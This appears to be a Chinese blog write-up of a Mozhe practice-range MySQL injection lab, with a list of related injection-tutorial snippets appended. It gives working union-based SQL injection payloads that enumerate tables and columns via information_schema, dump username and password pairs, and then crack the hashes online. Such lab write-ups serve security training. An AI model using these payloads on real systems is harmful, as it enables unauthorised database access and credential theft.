墨者靶场- mysql注入
1、先判断是否存在sql注入,使用单引号报错
2、使用and 1=1 正常
and 1=2 报错
3、使用order by判断字段数
4、使用union select判断哪些字符存在注入点
5、使用函数进行信息收集
1、爆破数据库名
直接使用database()函数
2、爆破表名(由上面知数据库的版本为高版本,自带information_achema数据库)
-1 union select 1, 2,group_concat(table_name) ,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
使用group_concat()函数,查询所有的表
3、查询列名
id=-1 union select 1, 2,group_concat(column_name) ,4 from information_schema.columns where table_name='StormGroup_member'
4、爆数据
id=-1 union select 1, 2,group_concat(concat_ws('~',name,password)) ,4 from mozhe_Discuz_StormGroup.StormGroup_member
5、在cmd5解密工具,对加密密码解密
墨者靶场- mysql注入相关推荐
- 墨者靶场--手工注入mysql数据库
跟着小迪老师学习了sql注入,拿个靶场来练习一下自己也算是复习巩固之前学到的东西,下面让我们来一起吃西瓜把 首先我们先进入我们的墨者靶场,嘿嘿嘿 一块墨币还算好 要玩这个靶场主要要明白数据库的结构,和 ...
- 墨者学院mysql注入_【墨者学院】:SQL注入漏洞测试(delete注入)
0x00.题目描述: 背景介绍 最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份. 实训目标 1.熟练掌握留言板的工作原 ...
- 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...
- Pikachu靶场-SQL注入-搜索型注入过关步骤
Pikachu靶场-SQL注入-搜索型注入过关步骤 首先要明白MySQL数据库模糊搜索的语句,like '常%'.like '%常'.like '%常%' 这个几个,这里就不详说这个语句了 判断注入点 ...
- Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
文章目录 一.MySQL注入读写文件 1.搭建新的测试环境(靶场) 2.读写文件概述 3.读取文件 4.写入文件 二.HTTP头中的SQL注入 1.HTTP头中的SQL注入介绍 updatexml函数 ...
- iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)
系列文章目录 iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的 ...
- concat mysql sql注入_sql注入-mysql注入基础及常用注入语句
最近在教学中,关于SQL注入,总发现学生理解起来有些难度,其实主要的原因是对各类数据库以及SQL语句不熟悉,今天先介绍mysql注入需要掌握的基础, Mysql内置information_schema ...
- MySQL注入中报错的利用
MySQL注入中报错的利用 在很多的情况 下我们不能直接方便的进行注入,于是有了BENCHMARK延迟注射,如果能得到MySQL的错误信息的话,现在又有了更方便的方法. 网上流传了两三种方法,以前我在 ...
- mysql内置变量_详解MySQL注入利用的变量
MySQL注入数据库时,我们可以利用内置的变量来得到更多的mysql信息,下面就让我们一起来了解MySQL注入利用的变量. 当我们注射mysql库的输入点的时候,可以通过version()/user( ...
最新文章
- ElasticSearch配置扩展分词
- 记录下帮助一位网友解决的关于android子控件的onTouch或onClick和父OnTouch 冲突的问题。
- linux 如何连通网络
- 下列哪个工具可以编译java_SUN-Java认证考试题库
- java并发编程实战源码_java并发编程实战(附源码)
- Java学习手册:JDBC中getString()方法与getObject()方法有什么区别?
- unity序列帧优化—Addressables
- unity android gyro,Unity3D手机陀螺仪的使用方法
- 详细介绍光纤跳线接口类型PC, APC, UPC
- 阿里云ECS的1M带宽能干嘛?(详解)
- 快速将非Word中的不可编辑的公式转换为Word文档中公式编辑器里可编辑的公式的办法
- 开箱 | 小度智能音箱初体验
- 个人面试问答题知识库(一)百面机器学习篇
- 自编剧本——爱上坑神姐姐的少女(很H很暴力)
- linux一次三行显示文件内容,Linux 命令合集(二):查看文件及内容处理命令
- 基于SeedUbuntu16.04的缓冲区溢出实验
- 【论文解读】手术机器人系统的工作原理分析与解读
- 高空抛物检测方案设计(使用SOM进行轨迹分类)
- 软件内部更新,出现“解析包时出现问题”的错误后停止
- Python魔法方法指南